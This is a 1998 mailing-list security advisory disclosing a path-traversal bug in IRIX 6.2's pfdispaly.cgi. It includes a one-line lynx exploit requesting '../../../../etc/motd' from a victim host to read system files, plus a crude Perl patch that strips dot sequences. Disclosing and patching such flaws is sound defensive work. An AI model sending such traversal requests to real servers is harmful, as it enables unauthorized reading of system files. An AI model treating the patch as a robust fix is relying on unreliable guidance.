home *** CD-ROM | disk | FTP | other *** search
- Date: Tue, 17 Mar 1998 00:06:48 +0100
- From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
- Subject: IRIX performer_tools bug
-
- Do you remember the /cgi-bin/handler bug?
-
- Well, more of the same:
-
- Software:
- IRIX 6.2
- performer_tools.sw.webtools (Performer API Search Tool 2.2)
- /var/www/cgi-bin/pfdispaly.cgi
-
- Bug: Anyone can read files (as 'nobody') from your system:
-
- Exploit:
-
- lynx -source \
- 'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'
-
- for instance :-)
-
-
- Fix:
-
- *** pfdispaly.cgi.O Mon Mar 16 23:13:34 1998
- --- pfdispaly.cgi Mon Mar 16 23:36:29 1998
- ***************
- *** 14,19 ****
- --- 14,20 ----
- $fullcgiroot = "/var/www$cgiroot";
-
- $shortfilepath = "$ARGV[0]";
- + $shortfilepath =~ s/\.{2,}//g;
- $fullfilepath = "$maindocroot$shortfilepath";
- ($filename = $shortfilepath) =~ s/.*\/(.*)$/$1/;
-
-
-
- Note: I haven't tested the other Performer CGI's too much,
- maybe they will have more nasty bugs.
- (in fact, pfdispaly.cgi opens "$ARGV[0]" with "$maindocroot"
- prepended; but somewhere 'dangerous' characters are escaped)
-
- There is another bug at pfsearch.cgi; which lacks of
- a
- print "Content-type: text/html\n\n";
- line, so you get garbage in your browser.
-
- (and even worse, you have to enable JavaScript if you want
- to use this set of CGIs...)
-
-
- --
- J.A. Gutierrez So be easy and free
- when you're drinking with me
- I'm a man you don't meet every day
- finger me for PGP (the pogues)
-